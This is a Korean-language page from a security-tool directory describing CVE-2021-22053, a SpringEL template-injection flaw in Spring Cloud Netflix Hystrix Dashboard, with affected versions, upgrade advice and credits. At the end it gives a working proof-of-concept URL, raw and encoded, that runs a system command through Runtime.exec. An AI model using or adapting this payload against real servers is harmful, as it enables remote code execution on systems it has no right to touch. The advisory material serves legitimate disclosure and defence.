Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 — Spring Cloud Netflix Hystrix Dashboard 템플릿 해석 취약점 CVE-2021-22053 | Kitploit
도구/GitHubGitHub/seccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubseccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

Spring Cloud Netflix Hystrix Dashboard 템플릿 해석 취약점 CVE-2021-22053

저장소 보기
37813년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard 템플릿 해석 취약점

심각도

높음

공급업체

VMware의 Spring

설명

spring-cloud-netflix-hystrix-dashboard와 spring-boot-starter-thymeleaf를 함께 사용하는 애플리케이션은 뷰 템플릿을 해석하는 동안 요청 URI 경로에 제출된 코드를 실행할 수 있는 방법을 노출합니다. /hystrix/monitor;[사용자 제공 데이터]로 요청이 이루어지면 hystrix/monitor 뒤의 경로 요소가 SpringEL 표현식으로 평가되어 코드 실행으로 이어질 수 있습니다.

영향을 받는 VMware 제품 및 버전

별도로 명시되지 않는 한 심각도는 높음입니다.

  • Spring Cloud Netflix
    • 2.2.0.RELEASE ~ 2.2.9.RELEASE
    • 이전의 지원되지 않는 버전도 영향을 받습니다.

완화 방법

영향을 받는 버전을 사용하는 사용자는 다음 완화 조치를 적용해야 합니다. 사용자는 2.2.10.RELEASE+로 업그레이드해야 합니다. 다른 조치는 필요하지 않습니다. 이 문제를 해결한 릴리스에는 다음이 포함됩니다.

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

크레딧

이 취약점은 SecCoder Security Lab의 threedr3am([email protected])에 의해 식별되고 책임감 있게 보고되었습니다.

참조

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

기록

2021-11-17: 초기 취약점 보고서 게시됨.

POC

원시:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

인코딩:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

PS. 슬래시('/')는 명령어에 포함될 수 없습니다.

도구 다운로드